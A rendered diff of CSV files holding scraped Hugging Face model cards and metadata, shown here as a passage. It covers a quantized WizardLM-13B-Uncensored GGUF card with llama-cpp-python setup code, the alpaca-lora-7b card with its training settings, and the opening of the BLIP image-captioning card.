- **Option B** - Running in `text-generation-webui`
|
| 152 |
+
|
| 153 |
+
Further instructions can be found in the text-generation-webui documentation, here: [text-generation-webui/docs/04 ‐ Model Tab.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/04%20-%20Model%20Tab.md#llamacpp).
|
| 154 |
+
|
| 155 |
+
- **Option C** - Running from Python code
|
| 156 |
+
|
| 157 |
+
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries. Note that at the time of writing (Nov 27th 2023), ctransformers has not been updated for some time and is not compatible with some recent models. Therefore I recommend you use llama-cpp-python.
|
| 158 |
+
|
| 159 |
+
### How to load this model in Python code, using llama-cpp-python
|
| 160 |
+
|
| 161 |
+
For full documentation, please see: [llama-cpp-python docs](https://abetlen.github.io/llama-cpp-python/).
|
| 162 |
+
|
| 163 |
+
#### First install the package
|
| 164 |
+
|
| 165 |
+
Run one of the following commands, according to your system:
|
| 166 |
+
|
| 167 |
+
```shell
|
| 168 |
+
# Base ctransformers with no GPU acceleration
|
| 169 |
+
pip install llama-cpp-python
|
| 170 |
+
# With NVidia CUDA acceleration
|
| 171 |
+
CMAKE_ARGS=""-DLLAMA_CUBLAS=on"" pip install llama-cpp-python
|
| 172 |
+
# Or with OpenBLAS acceleration
|
| 173 |
+
CMAKE_ARGS=""-DLLAMA_BLAS=ON -DLLAMA_BLAS_VENDOR=OpenBLAS"" pip install llama-cpp-python
|
| 174 |
+
# Or with CLBLast acceleration
|
| 175 |
+
CMAKE_ARGS=""-DLLAMA_CLBLAST=on"" pip install llama-cpp-python
|
| 176 |
+
# Or with AMD ROCm GPU acceleration (Linux only)
|
| 177 |
+
CMAKE_ARGS=""-DLLAMA_HIPBLAS=on"" pip install llama-cpp-python
|
| 178 |
+
# Or with Metal GPU acceleration for macOS systems only
|
| 179 |
+
CMAKE_ARGS=""-DLLAMA_METAL=on"" pip install llama-cpp-python
|
| 180 |
+
|
| 181 |
+
# In windows, to set the variables CMAKE_ARGS in PowerShell, follow this format; eg for NVidia CUDA:
|
| 182 |
+
$env:CMAKE_ARGS = ""-DLLAMA_OPENBLAS=on""
|
| 183 |
+
pip install llama-cpp-python
|
| 184 |
+
```
|
| 185 |
+
|
| 186 |
+
#### Simple llama-cpp-python example code
|
| 187 |
+
|
| 188 |
+
```python
|
| 189 |
+
from llama_cpp import Llama
|
| 190 |
+
|
| 191 |
+
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
|
| 192 |
+
llm = Llama(
|
| 193 |
+
model_path=""./WizardLM-13B-Uncensored.IQ3_M.gguf"", # Download the model file first
|
| 194 |
+
n_ctx=32768, # The max sequence length to use - note that longer sequence lengths require much more resources
|
| 195 |
+
n_threads=8, # The number of CPU threads to use, tailor to your system and the resulting performance
|
| 196 |
+
n_gpu_layers=35 # The number of layers to offload to GPU, if you have GPU acceleration available
|
| 197 |
+
)
|
| 198 |
+
|
| 199 |
+
# Simple inference example
|
| 200 |
+
output = llm(
|
| 201 |
+
""<s>[INST] {{prompt}} [/INST]"", # Prompt
|
| 202 |
+
max_tokens=512, # Generate up to 512 tokens
|
| 203 |
+
stop=[""</s>""], # Example stop token - not necessarily correct for this specific model! Please check before using.
|
| 204 |
+
echo=True # Whether to echo the prompt
|
| 205 |
+
)
|
| 206 |
+
|
| 207 |
+
# Chat Completion API
|
| 208 |
+
|
| 209 |
+
llm = Llama(model_path=""./WizardLM-13B-Uncensored.IQ3_M.gguf"", chat_format=""llama-2"") # Set chat_format according to the model you are using
|
| 210 |
+
llm.create_chat_completion(
|
| 211 |
+
messages = [
|
| 212 |
+
{{""role"": ""system"", ""content"": ""You are a story writing assistant.""}},
|
| 213 |
+
{{
|
| 214 |
+
""role"": ""user"",
|
| 215 |
+
""content"": ""Write a story about llamas.""
|
| 216 |
+
}}
|
| 217 |
+
]
|
| 218 |
+
)
|
| 219 |
+
```
|
| 220 |
+
|
| 221 |
+
- **Option D** - Running with LangChain
|
| 222 |
+
|
| 223 |
+
Here are guides on using llama-cpp-python and ctransformers with LangChain:
|
| 224 |
+
|
| 225 |
+
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
|
| 226 |
+
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
|
| 227 |
+
|
| 228 |
+
## Configurations
|
| 229 |
+
|
| 230 |
+
The configuration info are in `smash_config.json`.
|
| 231 |
+
|
| 232 |
+
## Credits & License
|
| 233 |
+
|
| 234 |
+
The license of the smashed model follows the license of the original model. Please check the license of the original model before using this model which provided the base model. The license of the `pruna-engine` is [here](https://pypi.org/project/pruna-engine/) on Pypi.
|
| 235 |
+
|
| 236 |
+
## Want to compress other models?
|
| 237 |
+
|
| 238 |
+
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
|
| 239 |
+
- Request access to easily compress your own AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).","{""id"": ""PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed"", ""author"": ""PrunaAI"", ""sha"": ""4c1a13337dd99ac4e5b642feda7f2a253f8a4128"", ""last_modified"": ""2025-02-18 23:08:25+00:00"", ""created_at"": ""2025-02-18 23:08:24+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""pruna-ai"", ""base_model:cognitivecomputations/WizardLM-13B-Uncensored"", ""base_model:finetune:cognitivecomputations/WizardLM-13B-Uncensored"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: cognitivecomputations/WizardLM-13B-Uncensored\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-18 23:08:25+00:00"", ""cardData"": ""base_model: cognitivecomputations/WizardLM-13B-Uncensored\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""transformersInfo"": null, ""_id"": ""67b512e8f703732d150e370b"", ""modelId"": ""PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BPrunaAI%2Fcognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed%5D(%2FPrunaAI%2Fcognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
WizardLM-2-8x22B_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
XTTS-v2_finetunes_20250424_150612.csv_finetunes_20250424_150612.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
all-MiniLM-L12-v2_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
alpaca-lora-7b_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
tloen/alpaca-lora-7b,"---
|
| 3 |
+
license: mit
|
| 4 |
+
datasets:
|
| 5 |
+
- yahma/alpaca-cleaned
|
| 6 |
+
---
|
| 7 |
+
|
| 8 |
+
This repo contains a low-rank adapter for LLaMA-7b
|
| 9 |
+
fit on the [Stanford Alpaca](https://github.com/tatsu-lab/stanford_alpaca) dataset.
|
| 10 |
+
|
| 11 |
+
This version of the weights was trained with the following hyperparameters:
|
| 12 |
+
|
| 13 |
+
- Epochs: 10 (load from best epoch)
|
| 14 |
+
- Batch size: 128
|
| 15 |
+
- Cutoff length: 512
|
| 16 |
+
- Learning rate: 3e-4
|
| 17 |
+
- Lora _r_: 16
|
| 18 |
+
- Lora target modules: q_proj, k_proj, v_proj, o_proj
|
| 19 |
+
|
| 20 |
+
That is:
|
| 21 |
+
|
| 22 |
+
```
|
| 23 |
+
python finetune.py \
|
| 24 |
+
--base_model='decapoda-research/llama-7b-hf' \
|
| 25 |
+
--num_epochs=10 \
|
| 26 |
+
--cutoff_len=512 \
|
| 27 |
+
--group_by_length \
|
| 28 |
+
--output_dir='./lora-alpaca-512-qkvo' \
|
| 29 |
+
--lora_target_modules='[q_proj,k_proj,v_proj,o_proj]' \
|
| 30 |
+
--lora_r=16 \
|
| 31 |
+
--micro_batch_size=8
|
| 32 |
+
```
|
| 33 |
+
|
| 34 |
+
Instructions for running it can be found at https://github.com/tloen/alpaca-lora.","{""id"": ""tloen/alpaca-lora-7b"", ""author"": ""tloen"", ""sha"": ""12103d6baae1b320aa60631b38acb6ea094a0539"", ""last_modified"": ""2023-04-04 16:39:14+00:00"", ""created_at"": ""2023-03-14 00:10:54+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 445, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:yahma/alpaca-cleaned"", ""license:mit"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- yahma/alpaca-cleaned\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='adapter_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='adapter_model.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""tloen/alpaca-lora"", ""chansung/LLM-As-Chatbot"", ""fl399/deplot_plus_llm"", ""rewoo/ReWOO-Demo"", ""zetavg/LLaMA-LoRA-Tuner-UI-Demo"", ""drift-ai/faq-website"", ""DESUCLUB/BLLAMA"", ""Kevin676/Alpaca-LoRA-with-Voice-Cloning"", ""Illumotion/Koboldcpp"", ""mustapha/chatAlpaca"", ""NeuralInternet/Alpaca-LoRA-Serve"", ""AnonymousSub/Ayurveda4U"", ""Canstralian/WizardLM-1.6"", ""winglian/llama-adapter"", ""cnrai/alpaca-30b-app"", ""Msp/deplot_plus_llm"", ""edson31415/alpaca-lora-7b-test"", ""darpan-jain/llm-chat"", ""ShahrukhYousafzai/Alpaca-Lora"", ""russellsparadox/project0"", ""sagu7/alpaca-lora"", ""hitsense/sense_faq"", ""mazafard/freefeed.me"", ""Ordenador/alpaca-lora"", ""shivanshsyal3/alpaca"", ""shivanshsyal3/alpaca2"", ""JohnTan38/Alpaca-LoRA-Serve"", ""sorokinvld/alpaca-lora"", ""NeuralInternet/Alpaca-LoRA"", ""esmat/Alpaca-LoRA-Serve"", ""Fan21/a"", ""4nd3r50n/alpaca-lora"", ""sinkaroid/alpaca-lora"", ""sinkaroid/EleutherAI-gpt-j-6b"", ""peter-v/faq-website"", ""victorrodrigues20/Alpaca-LoRA-Serve"", ""sepehr09/alpaca-lora"", ""kristada673/WizardCoder"", ""faisalhr1997/Koboldcpp"", ""freQuensy23/ru-openllama-space"", ""ganfanghao/model"", ""AIProdAndInnov/ReWOO-Demo"", ""brandonmai/duhoc-rewoo-agent"", ""sakshi7502/SVFT_PEFT""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-04-04 16:39:14+00:00"", ""cardData"": ""datasets:\n- yahma/alpaca-cleaned\nlicense: mit"", ""transformersInfo"": null, ""_id"": ""640fbb8e56a3dda8aed24ffb"", ""modelId"": ""tloen/alpaca-lora-7b"", ""usedStorage"": 151362075}",0,,0,,0,,0,,0,"AIProdAndInnov/ReWOO-Demo, Canstralian/WizardLM-1.6, DESUCLUB/BLLAMA, Illumotion/Koboldcpp, Kevin676/Alpaca-LoRA-with-Voice-Cloning, chansung/LLM-As-Chatbot, drift-ai/faq-website, fl399/deplot_plus_llm, huggingface/InferenceSupport/discussions/new?title=tloen/alpaca-lora-7b&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Btloen%2Falpaca-lora-7b%5D(%2Ftloen%2Falpaca-lora-7b)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mustapha/chatAlpaca, rewoo/ReWOO-Demo, tloen/alpaca-lora, zetavg/LLaMA-LoRA-Tuner-UI-Demo",13
|
blip-image-captioning-large_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
@@ -0,0 +1,1130 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
Salesforce/blip-image-captioning-large,"---
|
| 3 |
+
pipeline_tag: image-to-text
|
| 4 |
+
tags:
|
| 5 |
+
- image-captioning
|
| 6 |
+
languages:
|
| 7 |
+
- en
|
| 8 |
+
license: bsd-3-clause
|
| 9 |
+
---
|
| 10 |
+
|
| 11 |
+
# BLIP: Bootstrapping Language-Image Pre-training for Unified Vision-Language Understanding and Generation
|
| 12 |
+
|
| 13 |
+
Model card for image captioning pretrained on COCO dataset - base architecture (with ViT large backbone).
|
| 14 |
+
|
| 15 |
+
|  |
|
| 16 |
+
|:--:|
|
| 17 |
+
| <b> Pull figure from BLIP official repo | Image source: https://github.com/salesforce/BLIP </b>|
|
| 18 |
+
|
| 19 |
+
## TL;DR
|
| 20 |
+
|
| 21 |
+
Authors from the [paper](https://arxiv.org/abs/2201.12086) write in the abstract:
|
| 22 |
+
|
| 23 |
+
*Vision-Language Pre-training (VLP) has advanced the performance for many vision-language tasks. However, most existing pre-trained models only excel in either understanding-based tasks or generation-based tasks. Furthermore, performance improvement has been largely achieved by scaling up the dataset with noisy image-text pairs collected from the web, which is a suboptimal source of supervision. In this paper, we propose BLIP, a new VLP framework which transfers flexibly to both vision-language understanding and generation tasks. BLIP effectively utilizes the noisy web data by bootstrapping the captions, where a captioner generates synthetic captions and a filter removes the noisy ones. We achieve state-of-the-art results on a wide range of vision-language tasks, such as image-text retrieval (+2.7% in average recall@1), image captioning (+2.8% in CIDEr), and VQA (+1.6% in VQA score). BLIP also demonstrates strong generalization ability when directly transferred to videolanguage tasks in a zero-shot manner. Code, models, and datasets are released.*
|
| 24 |
+
|
| 25 |
+
## Usage
|
| 26 |
+
|
| 27 |
+
You can use this model for conditional and un-conditional image captioning
|
| 28 |
+
|
| 29 |
+
### Using the Pytorch model
|
| 30 |
+
|
